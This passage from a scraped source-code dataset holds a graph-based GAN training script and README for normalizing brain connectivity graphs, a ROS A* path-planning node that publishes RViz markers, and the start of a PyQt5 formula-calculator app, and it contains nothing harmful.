plotting_loss(losses_generator, losses_discriminator, epoch):\r\n plt.figure(1)\r\n plt.plot(epoch, losses_generator, 'r-')\r\n plt.plot(epoch, losses_discriminator, 'b-')\r\n plt.legend(['G Loss', 'D Loss'])\r\n plt.xlabel('Epoch')\r\n plt.ylabel('Loss')\r\n plt.savefig('./plot/loss' + str(epoch) + '.png')\r\n\r\n # -------------------------------------------------------------\r\n\r\n class Generator(nn.Module):\r\n def __init__(self):\r\n super(Generator, self).__init__()\r\n\r\n nn = Sequential(Linear(1, (nbr_of_regions*nbr_of_regions)), ReLU())\r\n self.conv1 = NNConv(nbr_of_regions, nbr_of_regions, nn, aggr='mean', root_weight=True, bias=True)\r\n self.conv11 = BatchNorm(nbr_of_regions, eps=1e-03, momentum=0.1, affine=True, track_running_stats=True)\r\n\r\n nn = Sequential(Linear(1, nbr_of_regions), ReLU())\r\n self.conv2 = NNConv(nbr_of_regions, 1, nn, aggr='mean', root_weight=True, bias=True)\r\n self.conv22 = BatchNorm(1, eps=1e-03, momentum=0.1, affine=True, track_running_stats=True)\r\n\r\n nn = Sequential(Linear(1, nbr_of_regions), ReLU())\r\n self.conv3 = NNConv(1, nbr_of_regions, nn, aggr='mean', root_weight=True, bias=True)\r\n self.conv33 = BatchNorm(nbr_of_regions, eps=1e-03, momentum=0.1, affine=True, track_running_stats=True)\r\n\r\n def forward(self, data):\r\n x, edge_index, edge_attr = data.x, data.edge_index, data.edge_attr\r\n\r\n x1 = F.sigmoid(self.conv11(self.conv1(x, edge_index, edge_attr)))\r\n x1 = F.dropout(x1, training=self.training)\r\n\r\n x2 = F.sigmoid(self.conv22(self.conv2(x1, edge_index, edge_attr)))\r\n x2 = F.dropout(x2, training=self.training)\r\n\r\n x3 = torch.cat([F.sigmoid(self.conv33(self.conv3(x2, edge_index, edge_attr))), x1], dim=1)\r\n x4 = x3[:, 0:nbr_of_regions]\r\n x5 = x3[:, nbr_of_regions:2*nbr_of_regions]\r\n\r\n x6 = (x4 + x5) / 2\r\n return x6\r\n\r\n class Discriminator1(torch.nn.Module):\r\n def __init__(self):\r\n super(Discriminator1, self).__init__()\r\n nn = Sequential(Linear(2, (nbr_of_regions*nbr_of_regions)), ReLU())\r\n self.conv1 = NNConv(nbr_of_regions, nbr_of_regions, nn, aggr='mean', root_weight=True, bias=True)\r\n self.conv11 = BatchNorm(nbr_of_regions, eps=1e-03, momentum=0.1, affine=True, track_running_stats=True)\r\n\r\n nn = Sequential(Linear(2, nbr_of_regions), ReLU())\r\n self.conv2 = NNConv(nbr_of_regions, 1, nn, aggr='mean', root_weight=True, bias=True)\r\n self.conv22 = BatchNorm(1, eps=1e-03, momentum=0.1, affine=True, track_running_stats=True)\r\n\r\n\r\n def forward(self, data, data_to_translate):\r\n x, edge_index, edge_attr = data.x, data.edge_index, data.edge_attr\r\n edge_attr_data_to_translate = data_to_translate.edge_attr\r\n\r\n edge_attr_data_to_translate_reshaped = edge_attr_data_to_translate.view(nbr_of_regions*nbr_of_regions, 1)\r\n\r\n gen_input = torch.cat((edge_attr, edge_attr_data_to_translate_reshaped), -1)\r\n x = F.relu(self.conv11(self.conv1(x, edge_index, gen_input)))\r\n x = F.dropout(x, training=self.training)\r\n x = F.relu(self.conv22(self.conv2(x, edge_index, gen_input)))\r\n\r\n return F.sigmoid(x)\r\n\r\n # ----------------------------------------\r\n # Training\r\n # ----------------------------------------\r\n\r\n n_fold_counter = 1\r\n plot_loss_g = np.empty((nbr_of_epochs), dtype=float)\r\n plot_loss_d = np.empty((nbr_of_epochs), dtype=float)\r\n\r\n kfold = KFold(n_splits=nbr_of_folds, shuffle=True, random_state=manualSeed)\r\n\r\n source_data = torch.from_numpy(data) # convert numpy array to torch tensor\r\n source_data = source_data.type(torch.FloatTensor)\r\n\r\n target_data = np.reshape(CBT, (1, nbr_of_regions, nbr_of_regions, 1))\r\n target_data = torch.from_numpy(target_data) # convert numpy array to torch tensor\r\n target_data = target_data.type(torch.FloatTensor)\r\n\r\n for train, test in kfold.split(source_data):\r\n # Loss function\r\n adversarial_loss = torch.nn.BCELoss()\r\n l1_loss = torch.nn.L1Loss()\r\n # Initialize generator and discriminator\r\n generator = Generator()\r\n discriminator1 = Discriminator1()\r\n\r\n generator.to(device)\r\n discriminator1.to(device)\r\n adversarial_loss.to(device)\r\n l1_loss.to(device)\r\n\r\n # Optimizers\r\n optimizer_G = torch.optim.AdamW(generator.parameters(), lr=0.005, betas=(0.5, 0.999))\r\n optimizer_D = torch.optim.AdamW(discriminator1.parameters(), lr=0.01, betas=(0.5, 0.999))\r\n\r\n # ------------------------------- select source data and target data -------------------------------\r\n\r\n train_source, test_source = source_data[train], source_data[test] ## from a specific source view\r\n\r\n # 1: everything random; 0: everything is the matrix in question\r\n\r\n train_casted_source = [d.to(device) for d in cast_data(train_source, 0)]\r\n train_casted_target = [d.to(device) for d in cast_data(target_data, 0)]\r\n\r\n for epoch in range(nbr_of_epochs):\r\n # Train Generator\r\n with torch.autograd.set_detect_anomaly(True):\r\n\r\n losses_generator = []\r\n losses_discriminator = []\r\n\r\n for data_A in train_casted_source:\r\n generators_output_ = generator(data_A) # 35 x35\r\n generators_output = generators_output_.view(1, nbr_of_regions, nbr_of_regions, 1).type(torch.FloatTensor)\r\n\r\n generators_output_casted = [d.to(device) for d in cast_data(generators_output, 0)]\r\n for (data_discriminator) in generators_output_casted:\r\n discriminator_output_of_gen = discriminator1(data_discriminator, data_A).to(device)\r\n\r\n g_loss_adversarial = adversarial_loss(discriminator_output_of_gen, torch.ones_like(discriminator_output_of_gen))\r\n\r\n g_loss_pix2pix = l1_loss(generators_output_, train_casted_target[0].edge_attr.view(nbr_of_regions, nbr_of_regions))\r\n\r\n g_loss = g_loss_adversarial + (hyper_param1 * g_loss_pix2pix)\r\n losses_generator.append(g_loss)\r\n\r\n discriminator_output_for_real_loss = discriminator1(data_A, train_casted_target[0])\r\n\r\n real_loss = adversarial_loss(discriminator_output_for_real_loss,\r\n (torch.ones_like(discriminator_output_for_real_loss, requires_grad=False)))\r\n fake_loss = adversarial_loss(discriminator_output_of_gen.detach(), torch.zeros_like(discriminator_output_of_gen))\r\n\r\n d_loss = (real_loss + fake_loss) / 2\r\n losses_discriminator.append(d_loss)\r\n\r\n optimizer_G.zero_grad()\r\n losses_generator = torch.mean(torch.stack(losses_generator))\r\n losses_generator.backward(retain_graph=True)\r\n optimizer_G.step()\r\n\r\n optimizer_D.zero_grad()\r\n losses_discriminator = torch.mean(torch.stack(losses_discriminator))\r\n\r\n losses_discriminator.backward(retain_graph=True)\r\n optimizer_D.step()\r\n\r\n print(\r\n \"[Epoch %d/%d] [D loss: %f] [G loss: %f]\"\r\n % (epoch, nbr_of_epochs, losses_discriminator, losses_generator))\r\n\r\n plot_loss_g[epoch] = losses_generator.detach().cpu().clone().numpy()\r\n plot_loss_d[epoch] = losses_discriminator.detach().cpu().clone().numpy()\r\n\r\n torch.save(generator.state_dict(), \"./weight_\" + str(n_fold_counter) + \"generator\" + \"_\" + \".model\")\r\n torch.save(discriminator1.state_dict(), \"./weight_\" + str(n_fold_counter) + \"dicriminator\" + \"_\" + \".model\")\r\n\r\n interval = range(0, nbr_of_epochs)\r\n plotting_loss(plot_loss_g, plot_loss_d, interval)\r\n n_fold_counter += 1\r\n torch.cuda.empty_cache()\r\n torch.cuda.empty_cache()\r\n\r\n\"\"\"\r\nnbr_of_sub = int(input('Please select the number of subjects: '))\r\nif nbr_of_sub < 5:\r\n print(\"You can not give less than 5 to the number of subjects. \")\r\n nbr_of_sub = int(input('Please select the number of subjects: '))\r\nnbr_of_regions = int(input('Please select the number of regions: '))\r\nnbr_of_epochs = int(input('Please select the number of epochs: '))\r\nnbr_of_folds = int(input('Please select the number of folds: '))\r\nhyper_param1 = 100\r\nnbr_of_feat = int((np.square(nbr_of_regions) - nbr_of_regions) / 2)\r\nnbr_of_sub_for_cbt = int(nbr_of_sub // 5) # CBT will be generated by %20 of the number of subjects.\r\n\r\ndata = np.random.normal(0.6, 0.3, (nbr_of_sub, nbr_of_regions, nbr_of_regions))\r\nindependent_data = np.random.normal(0.6, 0.3, (nbr_of_sub_for_cbt, nbr_of_regions, nbr_of_regions))\r\nCBT = netNorm(independent_data, nbr_of_sub_for_cbt, nbr_of_regions)\r\ngGAN(data, nbr_of_regions, nbr_of_epochs, nbr_of_folds, hyper_param1, CBT)\r\n\"\"\""
},
{
"alpha_fraction": 0.7752423286437988,
"alphanum_fraction": 0.7847874760627747,
"avg_line_length": 59.900001525878906,
"blob_id": "cfcd0bbef4c821b1ac8f3e82036dc83517ee252e",
"content_id": "378b172fcbcd35cf8751b564525773baa6450378",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 6714,
"license_type": "no_license",
"max_line_length": 782,
"num_lines": 110,
"path": "/README.md",
"repo_name": "zeynepgurler/gGAN",
"src_encoding": "UTF-8",
"text": "# gGAN-PY (graph-based Generative Adversarial Network for normalizing brain graphs with respect to a fixed template) in Python\ngGAN-PY (graph-based Generative Adversarial Network) framework for normalizing brain graphs with respect to a fixed template, coded up in Python\nby Zeynep Gürler and Ahmed Nebli. Please contact [email protected] for inquiries. Thanks.\n \n> **Foreseeing Brain Graph Evolution Over Time\nUsing Deep Adversarial Network Normalizer**\n> [Zeynep Gürler](https://github.com/zeynepgurler)<sup>1</sup>, [Ahmed Nebli](https://github.com/ahmednebli)<sup>1,2</sup>, [Islem Rekik](https://basira-lab.com/)<sup>1</sup>\n> <sup>1</sup>BASIRA Lab, Faculty of Computer and Informatics, Istanbul Technical University, Istanbul, Turkey\n> <sup>2</sup>National School for Computer Science (ENSI), Mannouba, Tunisia\n>\n> **Abstract:** *Foreseeing the brain \nevolution as a complex highly interconnected system, widely modeled as a graph, \nis crucial for mapping dynamic interactions between different anatomical regions \nof interest (ROIs) in health and disease. Interestingly, brain graph evolution \nmodels remain almost absent in the literature. Here we design an adversarial brain \nnetwork normalizer for representing each brain network as a transformation of a \nfixed centered population-driven connectional template. Such graph normalization \nwith respect to a fixed reference paves the way for reliably identifying the most \nsimilar training samples (i.e., brain graphs) to the testing sample at baseline \ntimepoint. The testing evolution trajectory will be then spanned by the selected \ntraining graphs and their corresponding evolution trajectories. We base our prediction\n framework on geometric deep learning which naturally operates on graphs and nicely preserves \n their topological properties. Specifically, we propose the first graph-based \n Generative Adversarial Network (gGAN) that not only learns how to normalize brain \n graphs with respect to a fixed connectional brain template (CBT) (i.e., a brain \n template that selectively captures the most common features across a brain population)\n but also learns a highorder representation of the brain graphs also called embeddings. We use these embeddings to compute the similarity between training and testing \n subjects which allows us to pick the closest training subjects at baseline timepoint to predict the evolution of the testing brain graph over time. A series of benchmarks against several comparison methods showed that our proposed method achieved the \nlowest brain disease evolution prediction error using a single baseline timepoint.\n\n \n# Detailed proposed framework pipeline\nThis work has been published in the Journal of workshop PRIME at MICCAI, 2020. Our framework is a brain graph evolution trajectory prediction framework based on a gGAN architecture comprising a normalizer network with respect to a fixed connectional brain template (CBT). Our learning-based framework comprises four key steps. (1) Learning to normalize brain graphs with respect to the CBT, (2) Embedding the training, testing graphs and the CBT, (3) Brain graph evolution prediction using top k-closest neighbor selection. Experimental results against comparison methods demonstrate that our framework can achieve the best results in terms of average mean absolute error (MAE). We evaluated our proposed framework from OASIS-2 preprocessed dataset (https://www.oasis-brains.org/). \n\nMore details can be found at: (link to the paper) and our research paper video on the BASIRA Lab YouTube channel (link). \n\n\n\n\n# Libraries to preinstall in Python\n* [Python 3.8](https://www.python.org/)\n* [PyTorch 1.4.0](http://pytorch.org/)\n* [Torch-geometric](https://github.com/rusty1s/pytorch_geometric)\n* [Torch-sparse](https://github.com/rusty1s/pytorch_sparse)\n* [Torch-scatter](https://github.com/rusty1s/pytorch_scatter)\n* [Scikit-learn 0.23.0+](https://scikit-learn.org/stable/)\n* [Matplotlib 3.1.3+](https://matplotlib.org/)\n* [Numpy 1.18.1+](https://numpy.org/)\n\n# Demo\n\ngGAN is coded in Python 3.8 on Windows 10. GPU is not needed to run the code.\nThis code has been slightly modified to be compatible across all PyTorch versions.\nIn this repo, we release the gGAN source code trained and tested on a simulated data as shown below:\n\n**Data preparation**\n\nWe simulated random graph dataset drawn from two Gaussian distributions using the function np.random.normal. \nNumber of subjects, number of regions, number of epochs and number of folds are manually \ninputted by the user when starting the demo.\n\nTo train and evaluate gGAN code on other datasets, you need to provide:\n\n• A tensor of size (n × m × m) stacking the symmetric matrices of the training subjects.\n n denotes the total number of subjects and m denotes the number of regions.<br/>\n\nThe demo outputs are:\n\n• A matrix of size (t × l × (m × m)) stacking the predicted features of the testing subjects.\nt denotes the total number of testing subjects, l denotes the number of varying k numbers.\n\n**Train and test gGAN**\n\nTo evaluate our framework, we used leave-one-out cross validation strategy.\n\nTo try our code, you can use: demo.py\nFor how to install and run our framework, go to LINKK\n\n# Python Code\nTo run gGAN, generate a fixed connectional brain template. Use netNorm: https://github.com/basiralab/netNorm-PY\n\n# Example Results\nIf you set the number of epochs as 500, number of subjects as 90 and number of regions as 35, you will approximately get the following outputs when running the demo with default parameter setting:\n\n\n\n# YouTube videos to install and run the code and understand how gGAN works\n\nTo install and run our prediction framework, check the following YouTube video:\nhttps://youtu.be/2zKle7GzrIM\n\nTo learn about how our architecture works, check the following YouTube video:\nhttps://youtu.be/5vpQIFzf2Go\n\n# Related References\nFast Representation Learning with Pytorch-geometric: Fey, Matthias, Lenssen, Jan E., 2019, ICLR Workshop on Representation Learning on Graphs and Manifolds\n\nNetwork Normalization for Integrating Multi-view Networks (netNorm): Dhifallah, S., Rekik, I., 2020, Estimation of connectional brain templates using selective multi-view network normalization\n\n# Please Cite the Following paper when using gGAN:\n\n@article{gurler2020, title={ Foreseeing Brain Graph Evolution Over Time\nUsing Deep Adversarial Network Normalizer}, <br/>\nauthor={Gurler Zeynep, Nebli Ahmed, Rekik Islem}, <br/>\njournal={Predictive Intelligence in Medicine International Society and Conference Series on Medical Image Computing and Computer-Assisted Intervention},\nvolume={}, <br/>\npages={}, <br/>\nyear={2020}, <br/>\npublisher={Springer} <br/>\n}<br/>\n\n\n\n\n\n\n"
}
] | 3 |
rafaelbarretorb/my_astar_pub
|
https://github.com/rafaelbarretorb/my_astar_pub
|
3f0d4399c489b8b30a3bc9946e1459172c1025b4
|
54cdeae9f1d4c148f3bdc407c24a0f6aab485c9c
|
d8cc2db16272f6024b125934a99b8bcfea8ca34c
|
refs/heads/master
| 2020-03-27T02:12:50.164758 | 2018-08-22T23:32:02 | 2018-08-22T23:32:02 | 145,773,775 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6213032007217407,
"alphanum_fraction": 0.6323635578155518,
"avg_line_length": 23.533924102783203,
"blob_id": "18eff975ff7b1b07b12dac77765d9c353f4a4d8d",
"content_id": "38a0509a5f13529de44c292c4a83f595c30e01af",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8318,
"license_type": "no_license",
"max_line_length": 146,
"num_lines": 339,
"path": "/src/pub_globalplanner.py",
"repo_name": "rafaelbarretorb/my_astar_pub",
"src_encoding": "UTF-8",
"text": "#! /usr/bin/env python\n\n\"\"\"\n\tThis node makes the A* Path Planning and publish the path in RViz using markers\n\n\"\"\"\n\n# chmod +x call_map_service.py\nimport rospy\nfrom nav_msgs.srv import GetMap, GetMapRequest\nimport sys \nimport numpy as np\nimport math\n\nfrom visualization_msgs.msg import Marker\nfrom geometry_msgs.msg import Point\n\nfrom geometry_msgs.msg import PoseWithCovarianceStamped\n\nfrom geometry_msgs.msg import PoseStamped\n\nfrom nav_msgs.msg import OccupancyGrid\n\n\nclass Node:\n def __init__(self, x, y, cost, pind):\n self.x = x\n self.y = y\n self.cost = cost\n self.pind = pind # parent indice\n\n\nclass GlobalPlanner():\n\tdef __init__(self):\n\t\trospy.init_node('global_planner')\n\t\tself.rate = rospy.Rate(30)\n\n\t\t# SUBSCRIBERS\n\n\t\t# Get the cost map\n\t\trospy.Subscriber('/move_base/global_costmap/costmap', OccupancyGrid, self.global_costmap_cb)\n\n\t\trospy.Subscriber('move_base_simple/goal', PoseStamped, self.goal_pose_cb)\n\n\t\trospy.Subscriber('/amcl_pose', PoseWithCovarianceStamped, self.start_pose_cb)\n\n\n\t\t# member variables\n\t\tself.MAP = None\n\t\tself.ROWS = None\n\t\tself.COLUMNS = None\n\t\tself.RESOLUTION = None\n\n\t\tself.goal = None\n\t\tself.start = None\n\n\t\t#self.grid = self.make_grid(self.MAP.data, self.ROWS, self.COLUMNS)\n\t\t\n\n\t\tself.loop()\n\n\t\trospy.spin()\n\n\n\t\t#\n\t# global costmap callback\n\tdef global_costmap_cb(self, msg):\n\t\tself.MAP = msg\n\n\t\t# Make the map grid only after receive the costmap\n\t\tself.grid = self.make_grid(msg.data, msg.info.height, msg.info.width)\n\t\tprint msg.info.resolution\n\t\tprint msg.info.height\n\n\n\tdef start_pose_cb(self, msg):\n\t\tself.start = msg\n\n\tdef goal_pose_cb(self, msg):\n\t\tself.goal = msg\n\n\n\tdef make_grid(self, map_data, grid_height, grid_width):\n\t\tgrid = np.zeros([grid_height, grid_width])\n\t\t# Occupancy grid\n\t\tfor index in range(len(map_data)):\n\t\t\trow = (int)(index/grid_width)\n\t\t\tcolumn = index%grid_width\n\t\t\tgrid[row][column] = map_data[index]\n\n\t\tprint \"grid shape: \"\n\t\tprint grid.shape\n\t\treturn grid\n\n\tdef calc_final_path(self, ngoal, closedset):\n\t\t# generate final course\n\t\trx, ry = [ngoal.x ], [ngoal.y]\n\t\tpind = ngoal.pind\n\t\twhile pind != -1:\n\t\t\tn = closedset[pind]\n\t\t\trx.append(n.x)\n\t\t\try.append(n.y)\n\t\t\tpind = n.pind\n\n\t\treturn rx, ry\n\n\t# A* Planner\n\tdef a_star_planning(self, start_x, start_y, goal_x, goal_y):\n\t \"\"\"\n\t start_x: start x position [m]\n\t start_y: start y position [m]\n\t goal_x: goal x position [m]\n\t goal_y: goal y position [m]\n\t \"\"\"\n\n\t # Initialize the start node and the goal node\n\t nstart = Node(start_x, start_y, 0.0, -1)\n\t ngoal = Node(goal_x, goal_y, 0.0, -1)\n\n\n\t motion = self.get_motion_model()\n\n\t openset, closedset = dict(), dict()\n\n\t # TODO nstart\n\t openset[(start_x,start_y)] = nstart\n\n\n\t while 1:\n\t \t# it selects the path that minimizes the function f(n) = g(n) + h(n), g(n) = cost and h(n) = heuristic\n\t\t\tc_id = min(openset, key=lambda n: openset[n].cost + self.heuristic(ngoal, openset[n].x, openset[n].y))\n\t\t\tcurrent = openset[c_id]\n\t\t\t#print(\"current\", current)\n\n\t # verify is the goal was achieved\n\t\t\tif current.x == ngoal.x and current.y == ngoal.y:\n\t\t\t\tprint(\"Find goal\")\n\t\t\t\tngoal.pind = current.pind\n\t\t\t\tngoal.cost = current.cost\n\t\t\t\tbreak\n\t \n\t\t\t# Remove the item from the open set\n\t\t\tdel openset[c_id]\n\n\t\t\t# Add it to the closed set\n\t\t\tclosedset[c_id] = current\n\n\t # expand search grid based on motion model\n\t # create new Nodes\n\t\t\tfor i in range(len(motion)):\n\t\t\t\tnode = Node(current.x + motion[i][0], current.y + motion[i][1], current.cost + motion[i][2], c_id)\n\t\t\t\t# node id?\n\t\t\t\tn_id = self.calc_index(node)\n\n\t\t\t\t# verify node\n\t\t\t\tif not self.verify_node(node):\n\t\t\t\t continue\n\n\t\t\t\tif n_id in closedset:\n\t\t\t\t\tcontinue\n\n\t\t\t\t# Otherwise if it is already in the open set\n\t\t\t\tif n_id in openset:\n\t\t\t\t\tif openset[n_id].cost > node.cost:\n\t\t\t\t\t\topenset[n_id].cost = node.cost\n\t\t\t\t\t\topenset[n_id].pind = c_id\n\t\t\t\telse:\n\t\t\t\t\topenset[n_id] = node\n\n\t rx, ry = self.calc_final_path(ngoal, closedset)\n\n\t return rx, ry\n\n\t# Heuristic\n\tdef heuristic(self, ngoal, x, y):\n\t w = 3.0 # weight of heuristic\n\t d = w * math.sqrt((ngoal.x - x)**2 + (ngoal.y - y)**2)\n\t return d\n\n\n\tdef verify_node(self, node):\n\n\t if node.x < 0:\n\t return False\n\t elif node.y < 0:\n\t return False\n\t elif node.x >= self.grid.shape[1]:\n\t return False\n\t elif node.y >= self.grid.shape[0]:\n\t return False\n\t elif self.grid[node.y][node.x] > 50:\n\t \treturn False\n\t \n\t return True\n\n\tdef calc_index(self, node):\n\t\treturn (node.y, node.x)\n\n\tdef get_motion_model(self):\n\t # dx, dy, cost\n\t motion = [[1, 0, 1],\n\t [0, 1, 1],\n\t [-1, 0, 1],\n\t [0, -1, 1],\n\t [-1, -1, math.sqrt(2)],\n\t [-1, 1, math.sqrt(2)],\n\t [1, -1, math.sqrt(2)],\n\t [1, 1, math.sqrt(2)]]\n\n\t return motion\n\n\n\tdef init_markers(self):\n\n\t\t# Set up our waypoint markers\n\t\tmarker_scale = 0.05\n\t\tmarker_lifetime = 0 # 0 is forever\n\t\tmarker_ns = 'waypoints'\n\n\t\tmarker_id = 1\n\n\t\tmarker_color = {'r': 1.0, 'g': 0.0, 'b': 0.0, 'a': 1.0}\n\n\n\t\t# Define a marker publisher.\n\n\t\t#self.marker_pub = rospy.Publisher('waypoint_markers', Marker, queue_size=100)\n\t\t#self.marker_pub = rospy.Publisher('/visualization_marker', Marker, queue_size=1000)\n\n\n\t\t# Initialize the marker points list.\n\n\t\tself.markers = Marker()\n\t\tself.markers.ns = marker_ns\n\t\tself.markers.id = marker_id\n\t\tself.markers.type = Marker.POINTS\n\t\tself.markers.action = Marker.ADD\n\t\tself.markers.lifetime = rospy.Duration(marker_lifetime)\n\n\t\tself.markers.scale.x = marker_scale\n\n\t\tself.markers.scale.y = marker_scale\n\n\t\tself.markers.color.r = marker_color['r']\n\t\tself.markers.color.g = marker_color['g']\n\t\tself.markers.color.b = marker_color['b']\n\t\tself.markers.color.a = marker_color['a']\n\t\tself.markers.header.frame_id = '/map'\n\t\tself.markers.header.stamp = rospy.Time.now()\n\t\tself.markers.points = list()\n\n\n\tdef loop(self):\n\t\t\n\t\twhile not rospy.is_shutdown():\n\t\t\trospy.wait_for_message('move_base_simple/goal', PoseStamped)\n\n\t\t\t## TODO: delete previous result path if it exists\n\t\t\t#deleteMarker(marker_id)\n\n\t\t\t# Print \" We have a new goal!\"\n\n\n\n\t\t\t# Initialize the visualization markers for RViz\n\t\t\t#self.init_markers()\n\n\t\t\tstart_x = self.start.pose.pose.position.x\n\t\t\tstart_y = self.start.pose.pose.position.y\n\t\t\tgoal_x = self.goal.pose.position.x\n\t\t\tgoal_y = self.goal.pose.position.y \n\n\t\t\t# convert to cell\n\t\t\tprint \"\"\n\t\t\tprint start_x, start_y, goal_x, goal_y\n\n\t\t\t# TODO: Given the robot's pose in the map frame, if you want the corresponding index into the occupancy grid map, you'd do something like this:\n\t\t\tstart_grid_x = int((start_x - self.MAP.info.origin.position.x) / self.MAP.info.resolution)\n\t\t\tstart_grid_y = int((start_y - self.MAP.info.origin.position.y) / self.MAP.info.resolution)\n\n\t\t\tgoal_grid_x = int((goal_x - self.MAP.info.origin.position.x) / self.MAP.info.resolution)\n\t\t\tgoal_grid_y = int((goal_y - self.MAP.info.origin.position.y) / self.MAP.info.resolution)\n\n\t\t\tprint start_grid_x, start_grid_y, goal_grid_x, goal_grid_y\n\t\t\tprint \"\"\n\n\t\t\trx ,ry = self.a_star_planning(start_grid_x, start_grid_y, goal_grid_x, goal_grid_y)\n\t\t\tpoints_list = []\n\t\t\t#print rx\n\t\t\t#print ry\n\t\t\t\n\t\t\ti = 0\n\t\t\tmarker_pub = rospy.Publisher('/a_star', Marker, queue_size=1000)\n\n\t\t\t\n\t\t\twhile(i < len(rx)):\t\t\t\n\n\n\t\t\t\t#self.markers.points.append(p)\n\t\t\t\t#self.marker_pub.publish(self.markers)\n\n\t\t\t\tpoints = Marker()\n\t\t\t\t#points.header.frame_id = \"/my_frame\"\n\t\t\t\tpoints.header.frame_id = \"/map\"\n\t\t\t\tpoints.header.stamp = rospy.Time.now()\n\t\t\t\tpoints.ns = \"points_and_lines\"\n\t\t\t\tpoints.action = points.ADD\n\t\t\t\tpoints.pose.orientation.w = 1.0\n\t\t\t\tpoints.id = 1\n\t\t\t\tpoints.type = points.POINTS\n\t\t\t\tpoints.scale.x = 0.05\n\t\t\t\tpoints.scale.y = 0.05\n\t\t\t\tpoints.scale.z = 0.05\n\t\t\t\tpoints.color.r = 1.0\n\t\t\t\tpoints.color.a = 1.0\n\n\t\t\t\tp = Point()\n\n\t\t\t\tp.x = rx[i]*self.MAP.info.resolution + self.MAP.info.origin.position.x\n\t\t\t\tp.y = ry[i]*self.MAP.info.resolution + self.MAP.info.origin.position.y\n\t\t\t\tp.z = 0.0\n\n\t\t\t\tpoints_list.append(p)\n\n\t\t\t\tpoints.points = points_list\n\n\t\t\t\tmarker_pub.publish(points)\n\t\t\t\ti = i + 1\n\t\t\t\t\t\t\t\n\t\t\t## TODO: update the goal\n\t\t\t#print points_list\n\t\t\tself.rate.sleep()\n\n\nif __name__ == '__main__':\n\ttry:\n\t\tGlobalPlanner()\n\texcept rospy.ROSInterruptException:\n\t\trospy.loginfo(\"Global Planner finished.\")\n\n"
}
] | 1 |
thekupidman/pythonravil9
|
https://github.com/thekupidman/pythonravil9
|
91d73917463fc4affd0bbb5ebf587dd349ff1811
|
6889d65011384e7f528a91ed713c9acd84c8b3da
|
48d86c95dc04cd50ce4063725423198e1b3d9e3f
|
refs/heads/master
| 2020-12-20T10:10:11.585462 | 2020-01-24T16:17:48 | 2020-01-24T16:17:48 | 236,037,434 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.47202008962631226,
"alphanum_fraction": 0.5337515473365784,
"avg_line_length": 23.75155258178711,
"blob_id": "b7a20d0676397cb5607cfeba73b4e976f7f28726",
"content_id": "06709b031f0a7a6cd893f368672fcaec87f42e08",
"detected_licenses": [
"Unlicense"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4030,
"license_type": "permissive",
"max_line_length": 130,
"num_lines": 161,
"path": "/pythonravil9/Main.py",
"repo_name": "thekupidman/pythonravil9",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n# coding=utf-8\n\nimport sys\nimport sys\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom PyQt5.QtCore import pyqtSlot\nfrom PyQt5 import uic,QtGui\nimport random\n\n\nclass MyRaschet:\n\n def __init__(self):\n self.A = 0\n self.B = 0\n self.X = 0\n self.KK = [0,0,0,0,0,0,0,0,0,0]\n self.YY = [0,0,0,0,0,0,0,0,0,0]\n\n def setA(self, v):\n self.A = float(v)\n\n def setB(self, v):\n self.B = float(v)\n\n def setX(self, v):\n self.X = float(v)\n\n def setKK(self, i, v):\n self.KK[i] = float(v)\n\n def raschet(self):\n i = 0\n while i < 10:\n sum = 0\n proizv = 1\n p = 0\n while p <= i:\n proizv = proizv * self.KK[p]\n if p % 2 == 1:\n sum = sum + self.KK[p]\n p = p + 1\n\n self.YY[i] = (((self.A * (self.X ** 4) + self.B * (self.X ** 3)) / (self.A ** 2 - self.B ** 3)) ** 3) / (proizv - sum)\n\n\n\n\n\n\n\n i = i + 1\n\n def getYY(self, i):\n return self.YY[i]\n\n\nclass Example(QWidget):\n\n def __init__(self):\n super().__init__()\n QWidget.__init__(self)\n self.initUI()\n self.setWindowIcon(QtGui.QIcon('images/logo.png'))\n\n def initUI(self):\n self.table = QTableWidget(self)\n self.table.setGeometry(8, 8, 249, 400)\n self.table.setColumnCount(2)\n self.table.setRowCount(10)\n\n self.btn1 = QPushButton(\"Заполнить случайными числами\", self)\n self.btn1.setGeometry(263, 288, 170, 57)\n\n self.btn2 = QPushButton(\"Очистить\", self)\n self.btn2.setGeometry(439, 288, 170, 57)\n\n self.btn3 = QPushButton(\"Расчет\", self)\n self.btn3.setGeometry(263, 351, 170, 57)\n\n self.btn4 = QPushButton(\"Выход\", self)\n self.btn4.setGeometry(439, 351, 170, 57)\n\n self.label = QLabel(self)\n self.label.setGeometry(263, 8, 350, 55)\n pixmap = QPixmap('9.png')\n self.label.setPixmap(pixmap)\n\n self.label1 = QLabel(self)\n self.label1.setGeometry(263, 115, 50, 15)\n self.label1.setText(\"A = \")\n\n self.label2 = QLabel(self)\n self.label2.setGeometry(263, 155, 50, 15)\n self.label2.setText(\"B = \")\n\n self.label3 = QLabel(self)\n self.label3.setGeometry(263, 195, 50, 15)\n self.label3.setText(\"X = \")\n\n self.edit1 = QTextEdit(self)\n self.edit1.setGeometry(312, 112, 121, 21)\n\n self.edit2 = QTextEdit(self)\n self.edit2.setGeometry(312, 152, 121, 21)\n\n self.edit3 = QTextEdit(self)\n self.edit3.setGeometry(312, 192, 121, 21)\n\n self.btn1.clicked.connect(self.btn1Click)\n self.btn2.clicked.connect(self.btn2Click)\n self.btn3.clicked.connect(self.btn3Click)\n self.btn4.clicked.connect(self.btn4Click)\n\n self.setGeometry(300, 300, 635, 460)\n self.setWindowTitle('Test')\n self.show()\n\n def btn1Click(self):\n y = 0\n while y < 10:\n self.table.setItem(y, 0, QTableWidgetItem(str(random.randint(1, 99))))\n y = y + 1\n\n def btn2Click(self):\n y = 0\n while y < 10:\n self.table.setItem(y, 0, QTableWidgetItem(\"\"))\n self.table.setItem(y, 1, QTableWidgetItem(\"\"))\n y = y + 1\n\n def btn3Click(self):\n raschet = MyRaschet()\n\n raschet.setA(self.edit1.toPlainText())\n raschet.setB(self.edit2.toPlainText())\n raschet.setX(self.edit3.toPlainText())\n\n y = 0\n while y < 10:\n v = self.table.item(y, 0).text()\n raschet.setKK(y, v)\n y = y + 1\n\n 